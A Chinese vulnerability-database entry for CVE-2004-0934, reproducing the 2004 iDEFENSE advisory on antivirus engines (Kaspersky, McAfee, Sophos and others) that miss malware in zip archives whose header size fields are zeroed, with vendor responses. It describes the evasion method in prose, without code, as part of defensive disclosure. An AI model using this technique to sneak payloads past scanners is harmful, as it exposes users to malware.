CVE-2004-0934
CVSS7.5
发布时间 :2005-01-27 00:00:00
修订时间 :2008-09-05 16:39:50
NMCP    

[原文]Kaspersky 3.x to 4.x allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system.


[CNNVD]Kaspersky zip文件 绕过检测漏洞(CNNVD-200501-310)

        Kaspersky是一款著名的防病毒软件。
        Kaspersky3.x及4.x版本在处理.zip文件时存在问题,导致出现绕过防病毒检查漏洞。
        攻击者可构建一个特殊的zip文件,将该zip文件的local字段和global字段均设置为0,就可绕过防病毒检测,而该zip文件还可以正常解压。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:mandrakesoft:mandrake_linux:10.1MandrakeSoft Mandrake Linux 10.1
cpe:/a:ca:etrust_intrusion_detection:1.4.1.13Computer Associates eTrust Intrusion Detection 1.4.1.13
cpe:/a:ca:etrust_antivirus:7.1Computer Associates eTrust Antivirus 7.1
cpe:/a:sophos:sophos_anti-virus:3.78dSophos Sophos Anti-Virus 3.78d
cpe:/a:rav_antivirus:rav_antivirus_for_file_servers:1.0
cpe:/a:sophos:sophos_puremessage_anti-virus:4.6
cpe:/o:mandrakesoft:mandrake_linux:10.1::x86_64
cpe:/a:sophos:sophos_anti-virus:3.84Sophos Sophos Anti-Virus 3.84
cpe:/a:sophos:sophos_anti-virus:3.82Sophos Sophos Anti-Virus 3.82
cpe:/a:ca:etrust_antivirus_gateway:7.0Computer Associates eTrust Antivirus Gateway 7.0
cpe:/o:suse:suse_linux:9.2SuSE SuSE Linux 9.2
cpe:/a:sophos:sophos_anti-virus:3.78Sophos Sophos Anti-Virus 3.78
cpe:/a:rav_antivirus:rav_antivirus_for_mail_servers:8.4.2
cpe:/a:sophos:sophos_anti-virus:3.86Sophos Sophos Anti-Virus 3.86
cpe:/a:ca:etrust_secure_content_manager:1.1Computer Associates eTrust Secure Content Manager 1.1
cpe:/a:rav_antivirus:rav_antivirus_desktop:8.6
cpe:/a:sophos:sophos_anti-virus:3.4.6Sophos Sophos Anti-Virus 3.4.6
cpe:/a:sophos:sophos_anti-virus:3.83Sophos Sophos Anti-Virus 3.83
cpe:/o:gentoo:linuxGentoo Linux
cpe:/a:sophos:sophos_small_business_suite:1.0
cpe:/a:kaspersky_lab:kaspersky_anti-virus:4.0
cpe:/a:ca:etrust_ez_antivirus:6.3Computer Associates eTrust EZ Antivirus 6.3
cpe:/a:ca:etrust_ez_antivirus:6.2Computer Associates eTrust EZ Antivirus 6.2
cpe:/a:ca:etrust_ez_armor:2.0Computer Associates eTrust EZ Armor 2.0
cpe:/a:sophos:sophos_anti-virus:3.80Sophos Sophos Anti-Virus 3.80
cpe:/a:mcafee:antivirus_engine:4.3.20McAfee McAfee Antivirus Engine 4.3.20
cpe:/a:ca:etrust_antivirus_gateway:7.1Computer Associates etrust Antivirus Gateway 7.1
cpe:/a:archive_zip:archive_zip:1.13
cpe:/a:ca:etrust_antivirus:7.0_sp2
cpe:/a:ca:inoculateit:6.0Computer Associates InoculateIT 6.0
cpe:/a:eset_software:nod32_antivirus:1.0.11
cpe:/a:eset_software:nod32_antivirus:1.0.13
cpe:/a:eset_software:nod32_antivirus:1.0.12
cpe:/a:ca:etrust_intrusion_detection:1.4.5Computer Associates eTrust Intrusion Detection 1.4.5
cpe:/a:ca:etrust_secure_content_manager:1.0Computer Associates eTrust Secure Content Manager 1.0
cpe:/a:ca:etrust_ez_armor:2.3Computer Associates eTrust EZ Armor 2.3
cpe:/a:ca:etrust_ez_antivirus:6.1Computer Associates eTrust EZ Antivirus 6.1
cpe:/a:ca:etrust_ez_armor:2.4Computer Associates eTrust EZ Armor 2.4
cpe:/a:ca:etrust_intrusion_detection:1.5Computer Associates eTrust Intrusion Detection 1.5
cpe:/a:ca:etrust_antivirus:7.0Computer Associates eTrust Antivirus 7.0
cpe:/a:sophos:sophos_anti-virus:3.81Sophos Sophos Anti-Virus 3.81
cpe:/a:ca:brightstor_arcserve_backup:11.1Computer Associates BrightStor ARCserve Backup 11.1
cpe:/o:gentoo:linux:1.4Gentoo Linux 1.4
cpe:/a:sophos:sophos_anti-virus:3.85Sophos Sophos Anti-Virus 3.85
cpe:/a:kaspersky_lab:kaspersky_anti-virus:5.0
cpe:/a:ca:etrust_secure_content_manager:1.0:sp1
cpe:/a:kaspersky_lab:kaspersky_anti-virus:3.0
cpe:/a:sophos:sophos_anti-virus:3.79Sophos Sophos Anti-Virus 3.79

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0934
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0934
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-310
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/968818
(UNKNOWN)  CERT-VN  VU#968818
http://www.securityfocus.com/bid/11448
(VENDOR_ADVISORY)  BID  11448
http://xforce.iss.net/xforce/xfdb/17761
(VENDOR_ADVISORY)  XF  antivirus-zip-protection-bypass(17761)
http://www.idefense.com/application/poi/display?id=153&type=vulnerabilities&flashstatus=true
(UNKNOWN)  IDEFENSE  20041018 Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability

- 漏洞信息

Kaspersky zip文件 绕过检测漏洞
高危 设计错误
2005-01-27 00:00:00 2006-12-21 00:00:00
远程  
        Kaspersky是一款著名的防病毒软件。
        Kaspersky3.x及4.x版本在处理.zip文件时存在问题,导致出现绕过防病毒检查漏洞。
        攻击者可构建一个特殊的zip文件,将该zip文件的local字段和global字段均设置为0,就可绕过防病毒检测,而该zip文件还可以正常解压。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.kaspersky.com/

- 漏洞信息 (F34757)

iDEFENSE Security Advisory 2004-10-18.t (PacketStormID:F34757)
2004-10-26 00:00:00
iDefense Labs  idefense.com
advisory,local,virus
CVE-2004-0934
[点击下载]

iDEFENSE Security Advisory 10.18.04: Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability. Multiple anti-virus vendors including McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV are affected. The problem specifically exists in the parsing of .zip archive headers. It is possible to modify the uncompressed size of archived files in both the local and global header without affecting functionality. An attacker can compress a malicious payload and evade detection by some anti-virus software by modifying the uncompressed size within the local and global headers to zero.

Multiple Vendor Anti-Virus Software Detection Evasion Vulnerability

iDEFENSE Security Advisory 10.18.04:

I. BACKGROUND

This vulnerability affects multiple anti-virus vendors including McAfee,
Computer Associates, Kaspersky, Sophos, Eset and RAV.

II. DESCRIPTION

Remote exploitation of an exceptional condition error in multiple
vendors' anti-virus software allows attackers to bypass security
protections by evading virus detection.

The problem specifically exists in the parsing of .zip archive headers.
The .zip file format stores information about compressed files in two
locations - a local header and a global header. The local header exists
just before the compressed data of each file, and the global header
exists at the end of the .zip archive. It is possible to modify the
uncompressed size of archived files in both the local and global header
without affecting functionality. This has been confirmed with both
WinZip and Microsoft Compressed Folders. An attacker can compress a
malicious payload and evade detection by some anti-virus software by
modifying the uncompressed size within the local and global headers to
zero.

III. ANALYSIS

Successful exploitation allows remote attackers to pass malicious
payloads within a compressed archive to a target without being detected.
Most anti-virus engines have the ability to scan content packaged with
compressed archives. As such, users with up-to-date anti-virus software
are more likely to open attachments and files if they are under the
false impression that the archive was already scanned and found to not
contain a virus.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in the latest
versions of the engines provided by McAfee, Computer Associates,
Kaspersky, Sophos, Eset and RAV. The Vendor Responses section of this
advisory contains details on the status of specific vendor fixes for
this issue.

iDEFENSE has confirmed that the latest versions of the engines provided
by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable.

V. WORKAROUND

Filter all compressed file archives (.zip) at border gateways,
regardless of content.

VI. VENDOR RESPONSES

McAfee
"The McAfee scan engine has always been a market leader in detection of
viruses, worms and Trojans within compressed and archived file formats.
As such the mechanism used for the detection of such payloads has been
designed to ensure all archive files are thoroughly scanned at each
nested level in the file to ensure that all appropriate parts of the
file are scanned.

McAfee is aware of a proof of concept exploitation in Zip archive
payloads where information in the local header part of the archive is
modified.

The local header exists just before the compressed data of each file. It
is possible to modify the uncompressed size of archived files in the
local header without affecting functionality.  Consequently there is the
potential for a malicious payload to be hidden and avoid anti-virus
detection by modifying the uncompressed size within the local headers to
zero.

The techniques used by McAfee to analyze Zip archives have allowed a
comprehensive solution for the Zip file format vulnerability to be
provided to protect customers.

The latest update for the current 4320 McAfee Anti-Virus Engine DATS
drivers (Version 4398 released on Oct 13th 2004) further enhances the
protection afforded to McAfee customers against such potential exploits.

A DATS Driver update issued in Version 4397 (October 6th 2004) provided
early protection for the same potential exploit targeted specifically
for Gateway and Command line scanning.

If a detection of this type of exploit is found it will trigger the
message "Found the Exploit-Zip Trojan!" to be displayed.

Updates for the DAT files mentioned above can be located at the
following links:

Home (Retail) Users:
http://download.mcafee.com/uk/updates/updates.asp

Business (Enterprise) Users:
http://www.mcafeesecurity.com/uk/downloads/updates/dat.asp?id=1

It should be noted that whilst McAfee take the potential for this
exploit to be used maliciously seriously, to date no evidence of such an
exploit has been discovered. McAfee has provided additional protection
through the DATS driver update however with usage of the comprehensive
suite of anti-virus protection strategies provided by McAfee products,
MacAfee are confident that this exploit presented no additional threat
to its customers.

It should be noted that with McAfee on-access scanning active, such
modification for malicious purposes to hide payloads only delays
eventual detection - McAfee on-access detection will detect any payload
with malicious intent as malware.

McAfee continues to focus on ensuring that customers receive maximum
protection and provide a rapid response to all potential vulnerabilities
thus ensuring customer satisfaction."

Computer Associates
"With the assistance of iDEFENSE, Computer Associates has identified a
medium-risk vulnerability in a shared component of eTrust Antivirus
which may allow a specially crafted .ZIP file to bypass virus detection.
A number of CA products embed this technology including solutions from
eTrust, Brightstor and others.

Customers are encouraged to visit the CA support web site below for more
information about this vulnerability, a list of products and platforms
that are effected, and remediation procedures.
http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp.

At Computer Associates, every reported exposure is handled with the
utmost urgency. We strive to ensure that no customer is left in a
vulnerable situation."

Kaspersky
(09/24/2004)
"...this bug for scanners based on 3.x-4.x engines will be fixed in next
(not current) cumulative update.

For scanners based on new 5.0 engine we recommend you waiting for the
release of our next maintenance pack. We are going to release it in
October."

Sophos
"A vulnerability has been discovered in Sophos's handling of Zip archive
files, whereby a Zip file can be deliberately altered to prevent
accurate scanning by Sophos anti-virus products of its contents.

Although theoretically a risk, Sophos has not seen any examples of
malware attempting to employ this vulnerability.

Furthermore, The vulnerability does not prevent Sophos's desktop
on-access scanner from correctly detecting viruses (and preventing
actual infection) which manage to bypass the email gateway software, so
the risks of infection are very small.

Sophos has enhanced its scan engine to deal with malformed Zip files.
Version 3.87.0 of Sophos Anti-Virus on all operating system platforms
except Windows 95/98/Me includes this fix and customers will be
automatically updated to this version via EM Library from Wednesday 20
October 2004.  Additionally, a version of the software will be available
for download from the Sophos website from Friday 22 October 2004.

Sophos Anti-Virus for Windows 95/98/Me customers will be updated with
the fix from version 3.88.0 (available from 24 November 2004).

Sophos thanks iDEFENSE for their assistance in identifying this
vulnerability."

Eset
"The vulnerability was caused by the fact that some archive
compression/decompression software (including Winzip) incorrectly
handles compressed files with deliberately damaged header fields, thus,
in-fact, allowing creation of the damaged archive files, that could be
automatically repaired on the victims computer without notifying the
user.

Eset has made appropriate modifications to archive-scanning code to
handle such kind of archives immediately after receiving notification
from iDEFENSE. These changes are contained in archive-support module
version 1.020, released on 16th September 2004 at 21:00 CET. The update
was available for all clients with Automatic Virus-Signatures Update
set."

RAV
No vendor response

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
following names to these issues:

CAN-2004-0932 - McAfee
CAN-2004-0933 - Computer Associates
CAN-2004-0934 - Kaspersky
CAN-2004-0937 - Sophos
CAN-2004-0935 - Eset
CAN-2004-0936 - RAV

These are candidates for inclusion in the CVE list
(http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

09/16/2004  Initial vendor notification
09/16/2004  iDEFENSE clients notified
10/18/2004  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright © 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站